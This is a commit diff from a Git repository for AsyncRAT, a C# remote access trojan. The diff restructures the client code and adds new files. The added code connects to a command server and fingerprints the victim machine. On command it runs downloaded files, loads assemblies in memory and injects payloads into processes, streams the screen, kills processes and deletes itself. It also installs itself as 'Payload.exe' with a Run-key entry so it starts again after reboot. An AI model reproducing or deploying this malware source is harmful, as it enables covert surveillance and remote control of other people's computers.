Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source
This commit is contained in:
NYAN CAT 2019-02-09 19:12:11 -08:00
parent 8352f23389
commit 025731dc0d
15 changed files with 628 additions and 527 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs generated
View File

@ -45,11 +45,11 @@
this.sENDFILEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sENDFILETOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.rEMOTEDESKTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.ping = new System.Windows.Forms.Timer(this.components);
this.UpdateUI = new System.Windows.Forms.Timer(this.components);
this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.contextMenuStrip1.SuspendLayout();
this.statusStrip1.SuspendLayout();
this.SuspendLayout();
@ -68,6 +68,8 @@
this.listView1.GridLines = true;
this.listView1.Location = new System.Drawing.Point(0, 0);
this.listView1.Name = "listView1";
this.listView1.ShowGroups = false;
this.listView1.ShowItemToolTips = true;
this.listView1.Size = new System.Drawing.Size(915, 342);
this.listView1.TabIndex = 0;
this.listView1.UseCompatibleStateImageBehavior = false;
@ -107,7 +109,7 @@
this.rEMOTEDESKTOPToolStripMenuItem,
this.pROCESSMANAGERToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
this.contextMenuStrip1.Size = new System.Drawing.Size(275, 223);
this.contextMenuStrip1.Size = new System.Drawing.Size(275, 190);
//
// cLIENTOPTIONSToolStripMenuItem
//
@ -173,6 +175,13 @@
this.rEMOTEDESKTOPToolStripMenuItem.Text = "REMOTE DESKTOP";
this.rEMOTEDESKTOPToolStripMenuItem.Click += new System.EventHandler(this.rEMOTEDESKTOPToolStripMenuItem_Click);
//
// pROCESSMANAGERToolStripMenuItem
//
this.pROCESSMANAGERToolStripMenuItem.Name = "pROCESSMANAGERToolStripMenuItem";
this.pROCESSMANAGERToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER";
this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click);
//
// statusStrip1
//
this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
@ -202,13 +211,6 @@
this.UpdateUI.Interval = 1000;
this.UpdateUI.Tick += new System.EventHandler(this.UpdateUI_Tick);
//
// pROCESSMANAGERToolStripMenuItem
//
this.pROCESSMANAGERToolStripMenuItem.Name = "pROCESSMANAGERToolStripMenuItem";
this.pROCESSMANAGERToolStripMenuItem.Size = new System.Drawing.Size(274, 30);
this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER";
this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click);
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);

1
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandlePacket.cs
View File

@ -31,6 +31,7 @@ namespace AsyncRAT_Sharp.Handle_Packet
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("HWID").AsString);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("User").AsString);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString);
Client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString;
Client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
Program.form1.listView1.Items.Insert(0, Client.LV);
Settings.Online.Add(Client);

22
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs generated
View File

@ -8,21 +8,17 @@
// </auto-generated>
//------------------------------------------------------------------------------
namespace AsyncRAT_Sharp.Properties
{
namespace AsyncRAT_Sharp.Properties {
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")]
internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase
{
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "15.9.0.0")]
internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
public static Settings Default
{
get
{
public static Settings Default {
get {
return defaultInstance;
}
}

9
AsyncRAT-C#/Client/Client.csproj
View File

@ -11,6 +11,7 @@
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile>Client</TargetFrameworkProfile>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>x86</PlatformTarget>
@ -47,6 +48,9 @@
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Handle Packet\HandlePacket.cs" />
<Compile Include="Install\HiddenStartup.cs" />
<Compile Include="Install\NormalStartup.cs" />
<Compile Include="MessagePack\BytesTools.cs" />
<Compile Include="MessagePack\MsgPack.cs" />
<Compile Include="MessagePack\MsgPackType.cs" />
@ -54,6 +58,7 @@
<Compile Include="MessagePack\WriteTools.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Sockets\ClientSocket.cs" />
<Compile Include="StreamLibrary\Codecs\DirectDriverCodec.cs" />
<Compile Include="StreamLibrary\Codecs\MJPGCodec.cs" />
<Compile Include="StreamLibrary\Codecs\QuickCachedStreamCodec.cs" />
@ -85,6 +90,8 @@
<Compile Include="StreamLibrary\UnsafeCodecs\UnsafeQuickStream.cs" />
<Compile Include="StreamLibrary\UnsafeCodecs\UnsafeStreamCodec.cs" />
</ItemGroup>
<ItemGroup />
<ItemGroup>
<None Include="app.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

294
AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs Normal file
View File

@ -0,0 +1,294 @@
using Client.MessagePack;
using Client.Sockets;
using StreamLibrary;
using StreamLibrary.UnsafeCodecs;
using System;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Management;
using System.Net.Sockets;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace Client.Handle_Packet
{
class HandlePacket
{
/// Handle the packet
public static void Read(object Data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])Data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "sendMessage":
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
}
break;
case "Ping":
{
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
}
break;
case "sendFile":
{
Received();
string FullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(FullPath);
Process.Start(FullPath);
if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
{
Uninstall();
}
}
break;
case "sendMemory":
{
Received();
byte[] Buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string Injection = unpack_msgpack.ForcePathObject("Inject").AsString;
byte[] Plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
object[] parameters = new object[] { Buffer, Injection, Plugin };
Thread thread = null;
if (Injection.Length == 0)
{
thread = new Thread(new ParameterizedThreadStart(SendToMemory));
}
else
{
thread = new Thread(new ParameterizedThreadStart(RunPE));
}
thread.Start(parameters);
}
break;
case "close":
{
try
{
ClientSocket.Client.Shutdown(SocketShutdown.Both);
}
catch { }
Environment.Exit(0);
}
break;
case "uninstall":
{
Uninstall();
}
break;
case "remoteDesktop":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "false":
{
RemoteDesktop_Status = false;
}
break;
case "true":
{
RemoteDesktop_Status = true;
RemoteDesktop();
}
break;
}
}
break;
case "processManager":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "List":
{
ProcessManager();
}
break;
case "Kill":
{
ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
}
break;
}
}
break;
}
}
catch { }
}
private static void Received()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Received";
ClientSocket.BeginSend(msgpack.Encode2Bytes());
}
private static void ProcessKill(int ID)
{
foreach (var process in Process.GetProcesses())
{
try
{
if (process.Id == ID)
{
process.Kill();
}
}
catch { };
}
ProcessManager();
}
private static void ProcessManager()
{
StringBuilder sb = new StringBuilder();
var query = "SELECT ProcessId, Name, ExecutablePath FROM Win32_Process";
using (var searcher = new ManagementObjectSearcher(query))
using (var results = searcher.Get())
{
var processes = results.Cast<ManagementObject>().Select(x => new
{
ProcessId = (UInt32)x["ProcessId"],
Name = (string)x["Name"],
ExecutablePath = (string)x["ExecutablePath"]
});
foreach (var p in processes)
{
if (File.Exists(p.ExecutablePath))
{
string name = p.ExecutablePath;
string key = p.ProcessId.ToString();
Icon icon = Icon.ExtractAssociatedIcon(p.ExecutablePath);
Bitmap bmpIcon = icon.ToBitmap();
using (MemoryStream ms = new MemoryStream())
{
bmpIcon.Save(ms, ImageFormat.Png);
sb.Append(name + "-=>" + key + "-=>" + Convert.ToBase64String(ms.ToArray()) + "-=>");
}
}
}
}
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "processManager";
msgpack.ForcePathObject("Message").AsString = sb.ToString();
ClientSocket.BeginSend(msgpack.Encode2Bytes());
}
private static bool RemoteDesktop_Status { get; set; }
private static void RemoteDesktop()
{
try
{
IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(80);
while (RemoteDesktop_Status == true)
{
Thread.Sleep(1);
if (!ClientSocket.Client.Connected) break;
Bitmap bmp = CaptureScreen();
Rectangle rect = new Rectangle(0, 0, bmp.Width, bmp.Height);
Size size = new Size(bmp.Width, bmp.Height);
BitmapData bmpData = bmp.LockBits(new Rectangle(0, 0, bmp.Width, bmp.Height), ImageLockMode.ReadWrite, bmp.PixelFormat);
using (MemoryStream stream = new MemoryStream(1000000))
{
unsafeCodec.CodeImage(bmpData.Scan0, rect, size, bmp.PixelFormat, stream);
if (stream.Length > 0)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
msgpack.ForcePathObject("Stream").SetAsBytes(stream.ToArray());
ClientSocket.BeginSend(msgpack.Encode2Bytes());
}
}
bmp.UnlockBits(bmpData);
bmp.Dispose();
}
}
catch { }
}
private static Bitmap CaptureScreen()
{
Rectangle rect = Screen.AllScreens[0].WorkingArea;
try
{
Bitmap bmpScreenshot = new Bitmap(rect.Width, rect.Height, PixelFormat.Format32bppArgb);
Graphics gfxScreenshot = Graphics.FromImage(bmpScreenshot);
gfxScreenshot.CopyFromScreen(0, 0, 0, 0, new Size(bmpScreenshot.Width, bmpScreenshot.Height), CopyPixelOperation.SourceCopy);
gfxScreenshot.Dispose();
return bmpScreenshot;
}
catch { return new Bitmap(rect.Width, rect.Height); }
}
private static void Uninstall()
{
ProcessStartInfo Del = null;
try
{
Del = new ProcessStartInfo()
{
Arguments = "/C choice /C Y /N /D Y /T 1 & Del " + Process.GetCurrentProcess().MainModule.FileName,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
};
ClientSocket.Client.Shutdown(SocketShutdown.Both);
ClientSocket.Client.Close();
}
catch { }
finally
{
Process.Start(Del);
Environment.Exit(0);
}
}
private static void SendToMemory(object obj)
{
object[] Obj = (object[])obj;
byte[] Buffer = (byte[])Obj[0];
Assembly Loader = Assembly.Load(Buffer);
object[] Parameters = null;
if (Loader.EntryPoint.GetParameters().Length > 0)
{
Parameters = new object[] { new string[] { null } };
}
Loader.EntryPoint.Invoke(null, Parameters);
}
private static void RunPE(object obj)
{
try
{
object[] Parameters = (object[])obj;
byte[] File = (byte[])Parameters[0];
string Injection = Convert.ToString(Parameters[1]);
byte[] Plugin = (byte[])Parameters[2];
Assembly Loader = Assembly.Load(Plugin);
Loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { File, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), Injection) });
}
catch { }
}
}
}

11
AsyncRAT-C#/Client/Install/HiddenStartup.cs Normal file
View File

@ -0,0 +1,11 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace Client.Install
{
class HiddenStartup
{
}
}

50
AsyncRAT-C#/Client/Install/NormalStartup.cs Normal file
View File

@ -0,0 +1,50 @@
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
namespace Client.Install
{
class NormalStartup
{
public static void Install()
{
try
{
if (Process.GetCurrentProcess().MainModule.FileName != Settings.ClientFullPath)
{
foreach (Process P in Process.GetProcesses())
{
try
{
if (P.MainModule.FileName == Settings.ClientFullPath)
P.Kill();
}
catch
{
Debug.WriteLine("NormalStartup Error : " + P.ProcessName);
}
}
FileStream Drop;
if (File.Exists(Settings.ClientFullPath))
Drop = new FileStream(Settings.ClientFullPath, FileMode.Create);
else
Drop = new FileStream(Settings.ClientFullPath, FileMode.CreateNew);
byte[] Client = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
Drop.Write(Client, 0, Client.Length);
Drop.Dispose();
Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath);
Process.Start(Settings.ClientFullPath);
Environment.Exit(0);
}
}
catch (Exception ex)
{
Debug.WriteLine("Install Failed : " + ex.Message);
}
}
}
}

2
AsyncRAT-C#/Client/MessagePack/BytesTools.cs
View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack
namespace Client.MessagePack
{
public class BytesTools
{

2
AsyncRAT-C#/Client/MessagePack/MsgPack.cs
View File

@ -17,7 +17,7 @@ using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack
namespace Client.MessagePack
{
public class MsgPackEnum : IEnumerator
{

2
AsyncRAT-C#/Client/MessagePack/MsgPackType.cs
View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack
namespace Client.MessagePack
{
public enum MsgPackType
{

2
AsyncRAT-C#/Client/MessagePack/ReadTools.cs
View File

@ -5,7 +5,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack
namespace Client.MessagePack
{
class ReadTools
{

6
AsyncRAT-C#/Client/MessagePack/WriteTools.cs
View File

@ -1,11 +1,7 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack
namespace Client.MessagePack
{
class WriteTools
{

506
AsyncRAT-C#/Client/Program.cs
View File

@ -1,22 +1,8 @@
using AsyncRAT_Sharp.MessagePack;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.Devices;
using System;
using System.Diagnostics;
using System.Threading;
using Client.Sockets;
using System.IO;
using System.Net.Sockets;
using System.Text;
using System.Threading;
using System.Windows.Forms;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using StreamLibrary;
using StreamLibrary.UnsafeCodecs;
using System.Drawing;
using System.Drawing.Imaging;
using System.Management;
using System.Linq;
using System;
using Client.Install;
// │ Author : NYAN CAT
// │ Name : AsyncRAT // Simple Socket
@ -34,495 +20,25 @@ namespace Client
public static readonly string IP = "127.0.0.1";
public static readonly int Port = 6606;
public static readonly string Version = "0.2.3";
public static readonly string ClientFullPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "Payload.exe");
}
/// The Main Class
/// Contains all methods for socket and reading the packets
class Program
{
public static Socket Client { get; set; }
private static byte[] Buffer { get; set; }
private static long Buffersize { get; set; }
private static bool BufferRecevied { get; set; }
private static System.Threading.Timer Tick { get; set; }
private static MemoryStream MS { get; set; }
private static object SendSync { get; set; }
static void Main(string[] args)
{
InitializeClient();
NormalStartup.Install();
ClientSocket.InitializeClient();
while (true)
{
Thread.Sleep(1000);
}
}
/// Initialization variables and connect to socket.
public static void InitializeClient()
{
try
{
Client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
ReceiveTimeout = -1,
SendTimeout = -1,
};
Client.Connect(Settings.IP, Settings.Port);
Debug.WriteLine("Connected!");
Buffer = new byte[1];
Buffersize = 0;
BufferRecevied = false;
MS = new MemoryStream();
SendSync = new object();
BeginSend(SendInfo());
TimerCallback T = Ping;
Tick = new System.Threading.Timer(T, null, new Random().Next(30 * 1000, 60 * 1000), new Random().Next(30 * 1000, 60 * 1000));
Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
}
catch
{
Debug.WriteLine("Disconnected!");
Thread.Sleep(new Random().Next(1 * 1000, 6 * 1000));
Reconnect();
}
}
/// Cleanup everything and start to connect again.
public static void Reconnect()
{
if (Client.Connected) return;
Tick?.Dispose();
try
{
Client?.Close();
Client?.Dispose();
}
catch { }
MS?.Dispose();
InitializeClient();
}
/// Method to send our ID to server's listview.
private static byte[] SendInfo()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
msgpack.ForcePathObject("HWID").AsString = HWID();
msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString() + " " + Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
return msgpack.Encode2Bytes();
}
private static string HWID()
{
StringBuilder sb = new StringBuilder();
sb.Append(Environment.UserDomainName);
sb.Append(Environment.UserName);
sb.Append(Environment.MachineName);
sb.Append(Environment.Version);
return GetHash(sb.ToString());
}
private static string GetHash(string strToHash)
{
MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
bytesToHash = md5Obj.ComputeHash(bytesToHash);
StringBuilder strResult = new StringBuilder();
foreach (byte b in bytesToHash)
strResult.Append(b.ToString("x2"));
return strResult.ToString().Substring(0, 12).ToUpper();
}
/// get the length of the buffer by reading byte by byte [1]
/// until we get the full size.
public static void ReadServertData(IAsyncResult ar)
{
try
{
if (Client.Connected == false)
{
Reconnect();
return;
}
int Recevied = Client.EndReceive(ar);
if (Recevied > 0)
{
if (BufferRecevied == false)
{
if (Buffer[0] == 0)
{
Buffersize = Convert.ToInt64(Encoding.UTF8.GetString(MS.ToArray()));
Debug.WriteLine("/// Buffersize: " + Buffersize.ToString() + "Bytes ///");
MS.Dispose();
MS = new MemoryStream();
if (Buffersize > 0)
{
Buffer = new byte[Buffersize - 1];
BufferRecevied = true;
}
}
else
{
MS.Write(Buffer, 0, Buffer.Length);
}
}
else
{
MS.Write(Buffer, 0, Recevied);
if (MS.Length == Buffersize)
{
ThreadPool.QueueUserWorkItem(Read, MS.ToArray());
MS.Dispose();
MS = new MemoryStream();
Buffer = new byte[1];
Buffersize = 0;
BufferRecevied = false;
}
else
{
Buffer = new byte[Buffersize - MS.Length];
}
}
Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
}
else
{
Reconnect();
}
}
catch
{
Reconnect();
}
}
/// Handle the packet
public static void Read(object Data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])Data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "sendMessage":
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
}
break;
case "Ping":
{
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
}
break;
case "sendFile":
{
Received();
string FullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(FullPath);
Process.Start(FullPath);
if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
{
Uninstall();
}
}
break;
case "sendMemory":
{
Received();
byte[] Buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string Injection = unpack_msgpack.ForcePathObject("Inject").AsString;
byte[] Plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
object[] parameters = new object[] { Buffer, Injection, Plugin };
Thread thread = null;
if (Injection.Length == 0)
{
thread = new Thread(new ParameterizedThreadStart(SendToMemory));
}
else
{
thread = new Thread(new ParameterizedThreadStart(RunPE));
}
thread.Start(parameters);
}
break;
case "close":
{
try
{
Client.Shutdown(SocketShutdown.Both);
}
catch { }
Environment.Exit(0);
}
break;
case "uninstall":
{
Uninstall();
}
break;
case "remoteDesktop":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "false":
{
RemoteDesktop_Status = false;
}
break;
case "true":
{
RemoteDesktop_Status = true;
RemoteDesktop();
}
break;
}
}
break;
case "processManager":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "List":
{
ProcessManager();
}
break;
case "Kill":
{
ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
}
break;
}
}
break;
}
}
catch { }
}
private static void Received()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Received";
BeginSend(msgpack.Encode2Bytes());
}
private static void ProcessKill(int ID)
{
foreach (var process in Process.GetProcesses())
{
try
{
if (process.Id == ID)
{
process.Kill();
}
}
catch { };
}
ProcessManager();
}
private static void ProcessManager()
{
StringBuilder sb = new StringBuilder();
var query = "SELECT ProcessId, Name, ExecutablePath FROM Win32_Process";
using (var searcher = new ManagementObjectSearcher(query))
using (var results = searcher.Get())
{
var processes = results.Cast<ManagementObject>().Select(x => new
{
ProcessId = (UInt32)x["ProcessId"],
Name = (string)x["Name"],
ExecutablePath = (string)x["ExecutablePath"]
});
foreach (var p in processes)
{
if (File.Exists(p.ExecutablePath))
{
string name = p.ExecutablePath;
string key = p.ProcessId.ToString();
Icon icon = Icon.ExtractAssociatedIcon(p.ExecutablePath);
Bitmap bmpIcon = icon.ToBitmap();
using (MemoryStream ms = new MemoryStream())
{
bmpIcon.Save(ms, ImageFormat.Png);
sb.Append(name + "-=>" + key + "-=>" + Convert.ToBase64String(ms.ToArray()) + "-=>");
}
}
}
}
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "processManager";
msgpack.ForcePathObject("Message").AsString = sb.ToString();
BeginSend(msgpack.Encode2Bytes());
}
private static bool RemoteDesktop_Status { get; set; }
private static void RemoteDesktop()
{
try
{
IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(80);
while (RemoteDesktop_Status == true)
{
Thread.Sleep(1);
if (!Client.Connected) break;
Bitmap bmp = CaptureScreen();
Rectangle rect = new Rectangle(0, 0, bmp.Width, bmp.Height);
Size size = new Size(bmp.Width, bmp.Height);
BitmapData bmpData = bmp.LockBits(new Rectangle(0, 0, bmp.Width, bmp.Height), ImageLockMode.ReadWrite, bmp.PixelFormat);
using (MemoryStream stream = new MemoryStream(1000000))
{
unsafeCodec.CodeImage(bmpData.Scan0, rect, size, bmp.PixelFormat, stream);
if (stream.Length > 0)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
msgpack.ForcePathObject("Stream").SetAsBytes(stream.ToArray());
BeginSend(msgpack.Encode2Bytes());
}
}
bmp.UnlockBits(bmpData);
bmp.Dispose();
}
}
catch { }
}
private static Bitmap CaptureScreen()
{
Rectangle rect = Screen.AllScreens[0].WorkingArea;
try
{
Bitmap bmpScreenshot = new Bitmap(rect.Width, rect.Height, PixelFormat.Format32bppArgb);
Graphics gfxScreenshot = Graphics.FromImage(bmpScreenshot);
gfxScreenshot.CopyFromScreen(0, 0, 0, 0, new Size(bmpScreenshot.Width, bmpScreenshot.Height), CopyPixelOperation.SourceCopy);
gfxScreenshot.Dispose();
return bmpScreenshot;
}
catch { return new Bitmap(rect.Width, rect.Height); }
}
private static void Uninstall()
{
ProcessStartInfo Del = null;
try
{
Del = new ProcessStartInfo()
{
Arguments = "/C choice /C Y /N /D Y /T 1 & Del " + Process.GetCurrentProcess().MainModule.FileName,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
};
Client.Shutdown(SocketShutdown.Both);
Client.Close();
}
catch { }
finally
{
Process.Start(Del);
Environment.Exit(0);
}
}
private static void SendToMemory(object obj)
{
object[] Obj = (object[])obj;
byte[] Buffer = (byte[])Obj[0];
Assembly Loader = Assembly.Load(Buffer);
object[] Parameters = null;
if (Loader.EntryPoint.GetParameters().Length > 0)
{
Parameters = new object[] { new string[] { null } };
}
Loader.EntryPoint.Invoke(null, Parameters);
}
private static void RunPE(object obj)
{
try
{
object[] Parameters = (object[])obj;
byte[] File = (byte[])Parameters[0];
string Injection = Convert.ToString(Parameters[1]);
byte[] Plugin = (byte[])Parameters[2];
Assembly Loader = Assembly.Load(Plugin);
Loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { File, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), Injection) });
}
catch { }
}
public static void Ping(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = DateTime.Now.ToLongTimeString().ToString();
BeginSend(msgpack.Encode2Bytes());
}
/// Send
/// adding the buffersize in the beginning of the stream
public static void BeginSend(byte[] buffer)
{
lock (SendSync)
{
if (Client.Connected)
{
try
{
using (MemoryStream MS = new MemoryStream())
{
byte[] buffersize = Encoding.UTF8.GetBytes(buffer.Length.ToString() + Strings.ChrW(0));
MS.Write(buffersize, 0, buffersize.Length);
MS.Write(buffer, 0, buffer.Length);
Client.Poll(-1, SelectMode.SelectWrite);
Client.BeginSend(MS.ToArray(), 0, (int)(MS.Length), SocketFlags.None, EndSend, null);
}
}
catch
{
Reconnect();
}
}
}
}
public static void EndSend(IAsyncResult ar)
{
try
{
Client.EndSend(ar);
}
catch
{
Reconnect();
}
}
}
}
}

225
AsyncRAT-C#/Client/Sockets/ClientSocket.cs Normal file
View File

@ -0,0 +1,225 @@
using Client.MessagePack;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.Devices;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Text;
using System.Threading;
using System.Security.Cryptography;
using Client.Handle_Packet;
namespace Client.Sockets
{
class ClientSocket
{
public static Socket Client { get; set; }
private static byte[] Buffer { get; set; }
private static long Buffersize { get; set; }
private static bool BufferRecevied { get; set; }
private static Timer Tick { get; set; }
private static MemoryStream MS { get; set; }
private static object SendSync { get; set; }
/// Initialization variables and connect to socket.
public static void InitializeClient()
{
try
{
Client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
ReceiveTimeout = -1,
SendTimeout = -1,
};
Client.Connect(Settings.IP, Settings.Port);
Debug.WriteLine("Connected!");
Buffer = new byte[1];
Buffersize = 0;
BufferRecevied = false;
MS = new MemoryStream();
SendSync = new object();
BeginSend(SendInfo());
TimerCallback T = CheckServer;
Tick = new System.Threading.Timer(T, null, new Random().Next(30 * 1000, 60 * 1000), new Random().Next(30 * 1000, 60 * 1000));
Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
}
catch
{
Debug.WriteLine("Disconnected!");
Thread.Sleep(new Random().Next(1 * 1000, 6 * 1000));
Reconnect();
}
}
/// Cleanup everything and start to connect again.
public static void Reconnect()
{
if (Client.Connected) return;
Tick?.Dispose();
try
{
Client?.Close();
Client?.Dispose();
}
catch { }
MS?.Dispose();
InitializeClient();
}
/// Method to send our ID to server's listview.
private static byte[] SendInfo()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
msgpack.ForcePathObject("HWID").AsString = HWID();
msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString() + " " + Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName;
return msgpack.Encode2Bytes();
}
private static string HWID()
{
StringBuilder sb = new StringBuilder();
sb.Append(Environment.UserDomainName);
sb.Append(Environment.UserName);
sb.Append(Environment.MachineName);
sb.Append(Environment.Version);
return GetHash(sb.ToString());
}
private static string GetHash(string strToHash)
{
MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
bytesToHash = md5Obj.ComputeHash(bytesToHash);
